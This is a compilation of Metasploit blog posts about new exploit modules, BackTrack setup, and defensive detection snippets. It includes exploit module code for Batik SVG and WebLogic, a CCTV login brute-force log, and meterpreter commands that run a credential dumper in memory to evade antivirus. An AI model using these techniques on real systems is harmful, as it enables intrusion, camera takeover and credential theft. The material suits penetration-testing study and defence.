
This week in the U.S. is the unofficial start of summer, so that probably explains why it's been a bit of a slow week in the Metasploit community, hacking-wise. We have a few new modules for this week's update, but in addition to those, I'd like to mention a few new resources we've put together for the Metasploit development community.


Docs and Videos


Over the last few weeks, we've been working up some more comprehensive documentation on how to get started in Metasploit development. We now have a complete Metasploit Development Environment setup guide, which will take you from a fresh Ubuntu Linux installation, through a GitHub user creation, ending up with your own clone of the Metasploit Framework. Thanks to community contributor corelanc0d3r for the initial work on nailing down these procedures.


We also have a video demonstration of the same up, thanks to our esteemed tech writer, Thao. You can watch it here, if scrolling through long wiki pages of screenshots isn't your thing. For a lot of people, seeing the steps in action is helpful, since it at least proves that someone was able to step through it once.


Exploit developer sinn3r has put together a list of common anti-patterns that he sees when shepherding community-contributed modules through to the main Metasploit distribution. This is a great resource for people just starting out writing Metasploit modules -- the Metasploit open source community has evolved a set of local customs and preferences, which is mostly (but not completely) informed by common Ruby coding practices, so sinn3r's document touches on the usual style errors and faux pas that we see in new modules.


Metasploit core developer  egypt took the time to refresh and reorganize Metasploit's README, COPYING, and THIRD-PARTY files. Now, it's a little easier to figure out what's up with Metasploit's usage, hacking guidelines, and distribution goals. More importantly, by splitting out the licensing language from the usage language, the README is a lot more, well, readable.


Finally, we're changing how we credit modules in this blog. We used to go through this process of making a distinction between Metasploit module authors and vulnerability discoverers. Turns out, that can give the impression that the module authors do all of the vulnerability work, which, of course, isn't true. So, going forward, we'll be crediting all parties involved here, just like we do in the Metasploit module browser and the Metasploit user interface. Hopefully, that will clear up any confusion, and incidentally, make it easier to automatically generate the "New Module" section.


Speaking of the new modules, here they are, with links to the Exploit Database.


New Modules





If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see the most excellent release notes.

As of version 5 R2, BackTrack comes pre-installed with Metasploit 4.1.4, so it's now easier to use Metasploit Community Edition or Metasploit Pro on BackTrack. Here is how it's done:


  • After BackTrack boots, enter startx to get into the UI.
  • Install BackTrack in a virtual machine using the Install BackTrack icon in the top left corner. This is recommended so that Metasploit remembers its product key; otherwise, you would have to register Metasploit each time.
  • Log in with user root, password toor. Enter startx.
  • In the main menu, open BackTrack / Exploitation Tools / Network Exploitation Tools / Metasploit Framework and select start msfpro, which starts the service for the commercial Metasploit UI.
  • Open the Firefox browser from the Internet menu.
  • Enter the URL https://localhost:3790. Note that the connection must be https.
  • You'll see "This Connection is Untrusted". If the server cannot be reached, the Metasploit server may not be started. Please wait a few seconds and try again.
  • Since the Metasploit UI uses a user-generated, unsigned SSL certificate, Firefox complains that the connection is untrusted. Click on I understand the risks, Add Exception..., and Confirm Security Exception.
  • By default, Javascript is disabled in the Firefox BackTrack installation. You should enable Javascript for https://localhost first. To do this, click on Options... on the bottom right of your screen, and select Allow https://localhost.




  • Enter a username and password, and click Create Account. Click on Register your Metasploit license here!


Firefox on BackTrack is very restrictive with Javascript and redirects, so the registration process is more cumbersome than with a standard Firefox installation. The registration page is hosted on, leverages several background services to generate the product key, and requires Javascript. Here is what you need to do to register the license - please follow the steps precisely:


  • Click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  • Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  • Enter your email address and hit Go.
  • Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  • Hit Go again.
  • You'll see a redirect warning that starts with "Request". Simply ignore it.
  • Close the tab. You should now be back in the Metasploit Web UI




Within 5 minutes of completing the form, you'll receive an email with a product key. Copy it to the Product Key field, then click Activate License. You should now see this success message:




Now that you've registered Metasploit, you have access to the update packages, which give you access to new features, exploits, and bug fixes. To update Metasploit, follow these steps:


  1. In the Administration menu, choose Software Updates.
  2. Click Check for Updates.
  3. Click Install.
  4. Repeat the process until the software update reports that there are no more updates available.


Congratulations, you're good to go!

This week, let's talk about post-modules, since we have two new fun ones to discuss.


Windows PowerShell


Windows PowerShell is a scripting language and shell for Windows platforms, used primarily by system administrators. While untrusted scripts are not allowed to run by default, many users will be tempted to set their execution environments to be pretty permissive. This, in turn, can provide a rich (and almost completely overlooked) post-exploitation playground.


To that end, this update features a post-exploitation PowerShell download-and-execute module (exec_powershell), two PowerShell encoders, a post-module mixin, and a directory to stash sample PowerShell scripts in (under /scripts).


Thanks tons to Boris "RageLtMan" Lukashev for taking the lead on making sure this all works -- he, Spencer McIntyre, and the original research from Nicholas Nam on the subject made this all possible.


For more on PowerShell's features for post-exploitation, see Matthew Graeber's excellent Exploit Monday blog post.




On a slightly sillier note, this release also has sinn3r's surprisingly hilarious "OSX Text to Speech Utility." This module allows attackers to creep out their post-exploitation victims by whispering messages to them (or use any number of other stock OSX voices). While it's mostly for fun, I can see how this module can be part of a counter-phishing training payload -- people may be less likely to click on suspicious links next time if you end up giving them a good talking to via their iPod earbuds.

New Modules


In addition to the post-exploitation modules mentioned above, we have six new modules this month. In no particular order, we've got:






Hi all. I would like to take a minute to share some of my feelings about my first week here as a full-time Metasploit exploit developer, and share some exploit modules.


First of all, I would like to thank everyone on the Metasploit team for being so nice to me from the first week, and for helping me with anything I need. They are definitely going easy on me during my first days! Their support allowed me to build two exploits for the team during my first week here:


So today I would like to share some details about these modules, and I hope this will help those who are interested in building exploits using the framework.


This module abuses the SVG 1.1 <script> element, which was discovered by Nicolas Gregoire (@Agarri_FR) and documented in his blog.  After some research at Metasploit, as well as additional discussion with Nicolas, we wrote a module that allows the execution of Java via the Squiggle SVG Browser from Batik. We borrowed the proof of concept written by Nicolas, and the awesome library available in Metasploit to build Java-based exploits. Some interesting Metasploit techniques:

  • The payload is encoded as a jar with Msf::EncodedPayload::encoded_jar(), which returns a Rex::Zip::Jar instance. This class provides everything necessary to build the final jar. The final code would be something like:

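paths = [
     [ "Exploit.class" ],
     [ "Exploit$1.class"],
     [ "META-INF", "MANIFEST.MF" ]
]

p = regenerate_payload(cli)

# encoded_jar returns a Rex::Zip::Jar that already contains the payload
jar  = p.encoded_jar
paths.each do |path|
     # Add a directory entry for each parent directory not yet in the jar
     1.upto(path.length - 1) do |idx|
          full = path[0,idx].join("/") + "/"
          if !(jar.entries.map{|e| e.name}.include?(full))
               jar.add_file(full, '')
          end
     end

     # Copy the precompiled file from the framework's data directory into the jar
     fd = File.open(File.join(Msf::Config.install_root, "data", "exploits", "batik_svg", path), "rb")
     data = fd.read(fd.stat.size)
     jar.add_file(path.join("/"), data)
     fd.close
end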

  • In the above code the "Exploit.class" and the "MANIFEST.MF" items are based on the information provided by Nicolas in his blog. The java code to build "Exploit.class" can be found in "external/source/exploits/batik_svg/", which uses a SVG Handler to execute the Java code available on Metasploit to launch its own payloads:


public void initializeEventListeners(SVGDocument document) {
     SVGSVGElement root = document.getRootElement();
     EventListener listener = new EventListener() {
          public void handleEvent(Event event) {
               try {
                    // Hand control to the Metasploit payload loader
                    Payload.main(null);
               } catch (Exception e) {}
          }
     };
     // Run the listener as soon as the SVG document has loaded
     root.addEventListener("SVGLoad", listener, false);
}

  • The Payload class is the payload loader provided by Metasploit. The code and the binary (in case you need to modify, and recompile the "Exploit.class") can be found in the "metasploit" package available in the "external/source/javapayload" directory.
  • However, there is a downside to this vulnerability. Even though the <script> element can be abused to execute Java code within the Batik Framework, there are still strict Java permissions that prevent us from executing malicious code (such as a simple exec). Because of this, the "Enforced Security Scripting" option under "Preferences" in Squiggle must be disabled on the victim machine.


This one is an old buffer overflow in the Oracle Weblogic plug-in for the Apache Web server. There are two more exploits available in Metasploit for the same component, written by @pusscat.

One nice thing in the bea_weblogic_post_bof module is that it allows you to fingerprint the version of the Oracle Weblogic plug-in. It is done by forcing an error with a POST request containing a specially crafted Transfer-Encoding header. Fingerprinting allows you to:

  1. Write a "check()" function to confirm the existence of a vulnerable version before launching the exploit.
  2. Auto-detect the target when exploiting.

The path to the info leak in the assembly of the Oracle Weblogic plug-in can be found here.

Writing an HTTP client for Metasploit is a nice experience, because you can find nearly anything you need under the "Msf::Exploit::Remote::HttpClient" mixin. As an example, the specially crafted HTTP request to fingerprint the plug-in version, with an incorrect "Transfer-Encoding" header, can be built with the send_request_cgi() function:


# Random token used both as the bogus Transfer-Encoding value and as the body
my_data = rand_text_alpha(rand(5) + 8)
res = send_request_cgi({
          'method'  => 'POST',
          'uri'     => target_uri.path,
          'headers' => {
               'Transfer-Encoding' => my_data
          },
          'data'    => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
})

When handling the result of send_request_cgi(), remember that it can return nil (due to a timeout, for example). In our case, fingerprinting proceeds only if res is not nil, the response code is HTTP 200, and the body of the response includes the signature for the Oracle Weblogic plug-in. The fingerprinting can be done like so:

require 'date'  # for Date.parse

if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
     body = res.body
     # Each known build is tested against both patterns explicitly; inside a
     # `when`, `/a/ and /b/` would test only the second pattern.
     # BEA WebLogic 8.1 SP6 -
     if body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and body =~ /Change Number:<\/B> <I>779586/
          return "Version found: BEA WebLogic 8.1 SP6 -"
     # BEA WebLogic 8.1 SP5 -
     elsif body =~ /Build date\/time:<\/B> <I>Aug  5 2005 11:19:57/ and body =~ /Change Number:<\/B> <I>616810/
          return "Version found: BEA WebLogic 8.1 SP5 -"
     elsif body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and body =~ /Change Number:<\/B> <I>452998/
          return "Version found: BEA WebLogic 8.1 SP4 -"
     # Check for dates prior to patch release
     elsif body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
          build_date = Date.parse($1)
          if build_date <= Date.parse("Jul 28 2008")
               return "BEA WebLogic connector vulnerable"
          else
               return "BEA WebLogic connector not vulnerable"
          end
     else
          return "BEA WebLogic connector undefined"
     end
end

So that's all for now. I hope you enjoyed it, and I hope to be able to share more about exploiting with Metasploit soon!

At Rapid7, we often get asked what the top 10 Metasploit modules are. This is a hard question to answer: What does "top" mean anyway? Is it a personal opinion, or what is being used in the industry? Because many Metasploit users work in highly sensitive environments, and because we respect our users' privacy, the product doesn't report any usage reports back to us.


We may have found a way to answer your questions: We looked at our web server stats, specifically for the Metasploit Auxiliary and Exploit Database, to see which exploit and module pages were researched the most. Here they are, annotated with Tod Beardsley's excellent comments:


  1. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues.

  2. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it.

  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice.

  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines -- this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2.

  5. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006): Not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you.

  6. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module.

  7. Apache mod_isapi <= 2.2.14 Dangling Pointer (CVE-2010-0425): Although this is an exploit in Apache, don’t be fooled! It’s only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module’s release), and it’s only a DoS. Again, kind of a mystery as to why it’s so popular.

  8. Java AtomicReferenceArray Type Violation Vulnerability (CVE-2012-0507): This was initially discovered in the wild as a Java 0-day, and this module represented the fevered work of sinn3r and Juan Vazquez, who turned out the first reliable public cross-platform exploit for the bug. The blog post "CVE-2012-0507 - Java Strikes Again" shows a screenshot of Meterpreter sessions on Windows, Ubuntu, and OSX systems. In fact, this may be the first publicly demonstrable Java exploit that Just Works against all three platforms for the vulnerable versions of Java -- no extra configuration or fingerprinting is needed.

  9. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #9, I’d bet it’s the most-used module in classroom and test environments.

  10. Microsoft Plug and Play Service Overflow (CVE-2005-1983, MSB-MS05-039): This exploits the Plug and Play service on Windows 2000. This is the exploit that MS06-040 replaced, though until MS06-040, this was the most reliable exploit around for Windows 2000. The Zotob worm used it. Note that while the exploit isn’t 100% reliable, failed attempts had a tendency to trigger a reboot of the target, so the next attempt would be 100% successful. In other words, for some people, the reboot-on-failure is really more of a feature than a bug.


Let us know if you find this ranking interesting so we can continue sharing it in the future. We're excited to see how this list will look next month, and what the major changes will be!


If you want to use any of these exploits right now, you can download Metasploit for free!

This week's update highlights Metasploit modules for embedded operating systems (as opposed to the usual client or server targets), so let's hop to it.


CCTV Security Camera Hacking with Metasploit



On Tuesday, guest blogger Justin Cacak of Gotham Digital Science talked about his module, cctv_dvr_login. The latest update for Metasploit has it now, so if you happen to run into some of these devices, you can show off all your Hollywood hacking skills by panning and zooming the security camera in the executive washroom. Definitely an eye-popper of an exploit, and we're happy to be able to share the techniques with the open source community. For more details on this nifty attack, see our blog post on this topic and the article about this Metasploit module in Wired magazine!


More SCADA, More Problems


In a related vein, this week's update also has a module for another embedded service, RuggedCom's telnet server. RuggedCom, as the name implies, makes network gear designed for harsh, outdoorsy conditions, so it's used almost exclusively in SCADA deployments. According to the researchers "JC CREW," if you know a RuggedCom device's MAC address, you can calculate the default password. Now, if you happen to be in the same broadcast domain as the device (usually the same LAN, but sometimes a little farther out), you can learn the MAC address just by talking Ethernet to the target device.


However, it's not like you have to go to the trouble to pick the MAC address out of packets from RuggedCom devices -- the vendor helpfully displays the local MAC in the telnet banner. What?


Community contributor Borja Merino put together a Metasploit module to take advantage of this situation, telnet_ruggedcom. This module greps out the MAC address from the telnet banner, performs the password conversion magic, and stores it off into Metasploit's credential database for later use (say, with the telnet_login module).


Bugs in embedded systems like these have the added bonus for pen-testers in that they are often unpatched for months and years inside an organization. This is partly due to vendor reluctance to patch, but more so because the affected devices are often in hard-to-reach locations, like railyards and oil fields.


New Modules


Other than those, we have added five new modules to our exploit database this month. In no particular order, we've got:






From our guest blogger and Metasploit community contributor Justin Cacak at Gotham Digital Science.


A new module for the Metasploit Framework, cctv_dvr_login, discovers and tests the security of standalone CCTV (Closed Circuit Television) video surveillance systems. Such systems are frequently deployed in retail stores, living communities, personal residences, and business environments as part of their physical security program. However, many of these systems are vulnerable to exploitation that can allow attackers remote access. Such remote access, enabled by default, can allow not only the ability to view real-time video, but control of the cameras (if supported), and provide access to archived footage.


Most owners of CCTV video surveillance systems may not even be fully aware of the device's remote access capabilities as monitoring may be conducted exclusively via the local video console. This further increases the likelihood of attackers gaining/persisting remote access, with no indication to the owner that their video surveillance system and archived footage may be accessed remotely.


Here at Gotham Digital Science, we often encounter video surveillance systems during penetration testing engagements – some of which may be exposed to the Internet, either intentionally or by accident. With any video surveillance system it is often interesting (and sometimes very important) to find out exactly what cameras are monitoring/recording within the environment. Furthermore, access to such systems can often be utilized to support physical security testing initiatives.


This module targets standalone CCTV video surveillance systems by MicroDigital, HIVISION, CTRing, and a substantial number of other rebranded devices.


msf > use auxiliary/scanner/misc/cctv_dvr_login
msf auxiliary(cctv_dvr_login) > set RHOSTS
RHOSTS =>
msf auxiliary(cctv_dvr_login) > exploit

[*] CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] CCTV_DVR - [002/133] - Invalid user: 'user'
[*] CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] CCTV_DVR - [004/133] - Trying username:'admin' with password:'1111'
[+] Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface ( v1,1,3,1):
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Using the obtained passwords, the attacker can view live and recorded footage and move the camera through a web-based application.


In conclusion, physically monitoring sensitive locations within an environment is an important aspect of a well-rounded information security program. However, at the same time such video surveillance devices can themselves be a risk and are often overlooked during security audits and vulnerability/penetration tests. This module exploits one of the common types of standalone CCTV video surveillance systems in use globally. It is likely that other manufacturers and CCTV devices are similarly vulnerable.


Companies who want to protect against this type of attack should change default vendor passwords, use strong passwords, filter access to only trusted hosts, and only expose the CCTV system to the Internet if absolutely necessary. In addition, security professionals can use the new Metasploit module to scan their network for vulnerable systems.


If you’d like to get the technical details about this new Metasploit module, check out the Gotham Digital Science Blog.


The new CCTV module is already available in the Metasploit Framework. Simply download Metasploit and update to the latest version using the command msfupdate. The module will be added to the commercial Metasploit editions as a part of the normal release cycle later this week.

This week's update features a great big pile of Java source code, a makeover for a perennial favorite feature, and a handful of new exploits. Read on, or just skip all the yadda yadda and download Metasploit here.


Armitage Source


This week's biggest change in terms of LOC (lines of code) is the inclusion of the Armitage source code, in external/source/armitage. For a while now, we've been distributing Raphael Mudge's Armitage front-end for the Metasploit Framework, but the source has been over in; that makes for a disconnected experience for developers who might want to fix up Armitage bugs or experiment with new functionality. Now that we've got the source in the Metasploit distribution proper, that should make life easier for everyone. You can read lots more about Armitage at Raphael's site,


Psnuffle refresh


James "egypt" Lee pulled in Alex Malateaux's update for Psnuffle this week as well, so now psnuffle can eavesdrop on NTLMv2 connections and store those credentials away for later reuse. This update triggered a code cleanup on the rest of psnuffle in general, which brings a couple of heaping handfuls of small bugfixes. For some background on what all psnuffle can do in terms of credential eavesdropping, check the video demo from Max Moser.


New Modules


Only four new modules this week, but the PHP module by HD Moore and egypt is kind of a big deal. If you run a PHP-powered site, you might want to check this right away.


php_cgi_arg_injection by HD Moore and egypt exploits CVE-2012-1823 in PHP.

mozilla_nssvgvalue by Lincoln and corelanc0d3r exploits CVE-2011-3658 in Mozilla Firefox.

solarwinds_storage_manager_sql by sinn3r, exploits OSVDB-81634 in SolarWinds Storage Manager.

vlc_mms_bof  by sinn3r and juan, exploits CVE-2012-1775 in VLC prior to 2.0.0.





The purpose of this post is to point out a little-known jewel -- the -m flag to meterpreter's execute command. The help tells us that this flag causes the executable to "Execute from memory" but that doesn't really explain it. Here's an example of the -m option in action:


meterpreter > cd %systemroot%
meterpreter > cd system32
meterpreter > pwd
meterpreter > download cmd.exe
[*] downloading: cmd.exe -> cmd.exe
[*] downloaded : cmd.exe -> cmd.exe
meterpreter > execute -H -m -d calc.exe -i -f cmd.exe
Process 572 created.
Channel 5 created.
The system cannot find message text for message number 0x2350 in the message file for Application.

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.



Background that shell, type ps, and you'll notice there is a calc.exe process and no cmd.exe process. So what's happening here? First, we're downloading cmd.exe from the system. This isn't necessary if you already have a copy from another system. Next, we're executing calc.exe as a dummy executable and uploading another executable to run in its process space instead. On the target, this works by starting calc.exe in a suspended state, then using the Windows debugging API to rip out its guts and replace them with an executable we supply from the attacker machine.


Using the in-memory executable technique has a few major advantages. First, the name of the file doesn't show up in a process list so things like Task Manager will display it as whatever normal system executable you picked for the -d option. That's pretty important for staying undetected in the presence of a watchful eye. Second, the executable never touches disk. Avoiding writing executables to disk also means forensics is a bit harder -- there's no suspicious prefetch entry for a new executable, there's no new files or altered modification times. The executable itself could leave behind telltale evidence, of course, but every little bit helps. Staying entirely in memory means AV doesn't get another chance to catch us. Anti-Virus generally doesn't like a lot of the tools you often find very handy, such as Windows Credential Editor, so running them in memory gives you another option to avoid that nuisance. Here's what it looks like:


meterpreter > upload wce.exe
[*] uploading  : wce.exe -> wce.exe
[*] uploaded   : wce.exe -> wce.exe
meterpreter > ls wce.exe
[-] stdapi_fs_stat: Operation failed: The system cannot find the file specified.


AV decided wce.exe was evil and deleted it before we had a chance to get what we came for.  Let's try it in memory:


meterpreter > execute -H -m -d calc.exe -f wce.exe -a "-o foo.txt"
Process 3216 created.
meterpreter > cat foo.txt


Another advantage that might not be quite so obvious is that this is a means of getting a cmd.exe shell even if cmd is disabled or removed on the target. GPO preventing you from getting what you need? Just upload it into memory and carry on like nothing happened.
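A defender's view of the technique described above, as an added example that is not part of the original post or of Metasploit: because the hosted image is replaced, the PE header found at the process's image base in a memory capture stops matching the header of the file the process list names. The sketch assumes you already have both byte strings (file on disk and the first page of the in-memory image); the sample headers and all field values are constructed.

```ruby
# Added example: compare a process's in-memory PE header with its file on disk.
# ImageBase is skipped on purpose: the loader rewrites it when an image is relocated.
COMPARED_FIELDS = %i[timestamp entry_point size_of_image checksum].freeze

# Returns the compared header fields, or nil if the bytes are not a PE image.
def parse_pe_header(bytes)
  data = bytes.b
  return nil unless data.bytesize >= 0x40 && data.byteslice(0, 2) == "MZ"
  e_lfanew = data.byteslice(0x3C, 4).unpack1("V")       # offset of "PE\0\0"
  return nil unless data.byteslice(e_lfanew, 4) == "PE\0\0"
  opt = e_lfanew + 4 + 20                                # optional header start
  return nil if data.bytesize < opt + 68
  {
    timestamp:     data.byteslice(e_lfanew + 8, 4).unpack1("V"),
    entry_point:   data.byteslice(opt + 16, 4).unpack1("V"),
    size_of_image: data.byteslice(opt + 56, 4).unpack1("V"),
    checksum:      data.byteslice(opt + 64, 4).unpack1("V")
  }
end

# Returns one entry per header field that differs between disk and memory.
def hollowing_indicators(disk_bytes, memory_bytes)
  disk = parse_pe_header(disk_bytes)
  raise ArgumentError, "on-disk file is not a PE image" if disk.nil?
  mem = parse_pe_header(memory_bytes)
  # A wiped or missing header at the image base is itself worth reporting.
  return [{ field: :header, disk: "valid PE", memory: "missing or wiped" }] if mem.nil?
  COMPARED_FIELDS.reject { |f| disk[f] == mem[f] }
                 .map { |f| { field: f, disk: disk[f], memory: mem[f] } }
end

# Builds a minimal PE32 header for the samples below (constructed test data).
def build_sample_header(timestamp:, entry_point:, size_of_image:, checksum:)
  dos  = "MZ".b + "\0".b * 58 + [0x40].pack("V")         # e_lfanew at 0x3C
  coff = [0x014c, 1, timestamp, 0, 0, 0xE0, 0x0102].pack("vvVVVvv")
  opt  = "\0".b * 0xE0
  opt[0, 2]  = [0x010b].pack("v")                        # PE32 magic
  opt[16, 4] = [entry_point].pack("V")
  opt[56, 4] = [size_of_image].pack("V")
  opt[64, 4] = [checksum].pack("V")
  dos + "PE\0\0".b + coff + opt
end

# Constructed samples: the file on disk, an untouched process, a replaced image.
CALC_ON_DISK    = build_sample_header(timestamp: 0x4A5BC9D4, entry_point: 0x12D6C,
                                      size_of_image: 0xC0000, checksum: 0xCB2C7)
CLEAN_MEMORY    = CALC_ON_DISK.dup
HOLLOWED_MEMORY = build_sample_header(timestamp: 0x4A5BC60F, entry_point: 0x829A,
                                      size_of_image: 0x57000, checksum: 0x5C3D1)

if __FILE__ == $PROGRAM_NAME
  hollowing_indicators(CALC_ON_DISK, HOLLOWED_MEMORY).each do |hit|
    puts format("%-14s disk=%s memory=%s", hit[:field], hit[:disk], hit[:memory])
  end
end
```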

Hey, it's the first post-Metasploit 4.3.0 update, which means that I'm back in the blogging business. Huzzah!


We've all been heads-down for a while getting this bad boy out the door, so while there's not a ton of new functionality to talk about this week, we do have some neat new modules, and one API change for module developers.


Wake On LAN


"The most secure computer is the one that's not turned on," is an old computer security adage, speaking to the complexity of modern operating systems and applications. Unfortunately, this is no longer true, thanks to Wei "sinn3r" Chen's new Wake-on-LAN module.


Wake-On-LAN is a feature of some NICs that allows system administrators to remotely power on computers in the local broadcast domain. For many sites, this is equivalent to the LAN, so you can power on a machine from across the room or down the hall. Now that you can accomplish this same task from within Metasploit, it can be kind of spooky and funny.


Now, imagine walking into a site that went all bridge-network crazy, for example to forward DHCP requests. In such an environment, you'll now be able to power on machines that the client didn't realize were reachable -- say, across VLANs. That can make for a powerful demonstration of why bridging networks might not be such a good idea.
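To see where wake-ups are coming from on a bridged network like the one described above, a monitor can look for the Wake-on-LAN magic packet in captured UDP payloads. This is an added example, not code from Metasploit or the module; it relies on the standard magic packet layout (six 0xFF bytes, the target MAC repeated 16 times, then an optional 4- or 6-byte SecureOn password), and the addresses, allowlist and datagrams are constructed.

```ruby
# Added example: find Wake-on-LAN magic packets in captured UDP payloads and
# report the ones sent by hosts that are not expected to wake machines.
SYNC_STREAM = ("\xFF".b * 6).freeze   # every magic packet opens with 6 x 0xFF
MAC_REPEATS = 16                      # followed by the target MAC, 16 times

# Returns { mac:, secureon: } for the first magic packet found, else nil.
def parse_magic_packet(payload)
  data = payload.b
  pos = 0
  while (idx = data.index(SYNC_STREAM, pos))
    body = data.byteslice(idx + 6, 6 * MAC_REPEATS)
    if body && body.bytesize == 6 * MAC_REPEATS
      mac = body.byteslice(0, 6)
      if body == mac * MAC_REPEATS
        tail = data.bytesize - (idx + 6 + 6 * MAC_REPEATS)
        return {
          mac: mac.unpack("C6").map { |b| format("%02x", b) }.join(":"),
          secureon: [4, 6].include?(tail)   # trailing password present
        }
      end
    end
    pos = idx + 1   # the sync stream may start one byte later; keep scanning
  end
  nil
end

# Returns an alert for each magic packet whose sender is not on the allowlist.
def unexpected_wakeups(datagrams, authorized)
  datagrams.each_with_object([]) do |dgram, alerts|
    hit = parse_magic_packet(dgram[:payload])
    next if hit.nil? || authorized.include?(dgram[:src])
    alerts << { src: dgram[:src], target_mac: hit[:mac], secureon: hit[:secureon] }
  end
end

# Helper for the constructed samples below.
def build_magic_packet(mac, password = "".b)
  SYNC_STREAM + [mac.delete(":")].pack("H*") * MAC_REPEATS + password
end

# Constructed data: one management host is allowed to send wake-ups.
AUTHORIZED_SENDERS = ["10.0.5.10"].freeze
SAMPLE_DATAGRAMS = [
  { src: "10.0.5.10", payload: build_magic_packet("00:11:22:33:44:55") },
  # Extra leading 0xFF byte plus a 6-byte SecureOn password.
  { src: "10.0.9.77", payload: "\xFF".b + build_magic_packet("66:77:88:99:aa:bb",
                                                             "\x01\x02\x03\x04\x05\x06".b) },
  { src: "10.0.9.77", payload: "not a wake-up".b },
  # Sync stream present but the MAC block is truncated.
  { src: "10.0.9.78", payload: SYNC_STREAM + "\x00".b * 40 }
].freeze

if __FILE__ == $PROGRAM_NAME
  unexpected_wakeups(SAMPLE_DATAGRAMS, AUTHORIZED_SENDERS).each do |a|
    puts "unexpected wake-up for #{a[:target_mac]} from #{a[:src]}"
  end
end
```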


Smarter Print_* Methods


During and since the 4.3.0 release, we've been trying to nail down what a standard print statement ought to look like in the context of a Metasploit module. To that end, James "egyp7" Lee has refreshed all the print_* methods for HTTP browser modules to automatically prepend messages with a sensible client IP address. What this means is, if you're in the business of writing browser exploits, you would no longer write something like:


  print_status("#{} Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}...")


You should instead simply write:


  print_status "Sending Applet.jar"


This will result in the console messages:


  [*]    java_rmi_connection_impl - Sending Applet.jar
  [*]        vlc_mms_bof - Sending malicious page


This is nice because if you're running several browser exploits and have several potential targets, it's much easier to tell who's actually getting your exploits. Clients behind NATs are still difficult to distinguish in a human-readable way, but if you have good ideas on how to solve that problem, feel free to submit patches. (: Over the next few updates, all Metasploit print_* methods should end up with some sensible defaults for communication like this, which should make life easier for both module developers and users alike.


Other New Modules


Finally, sinn3r and friends have been busy knocking out new exploits for this week's update.





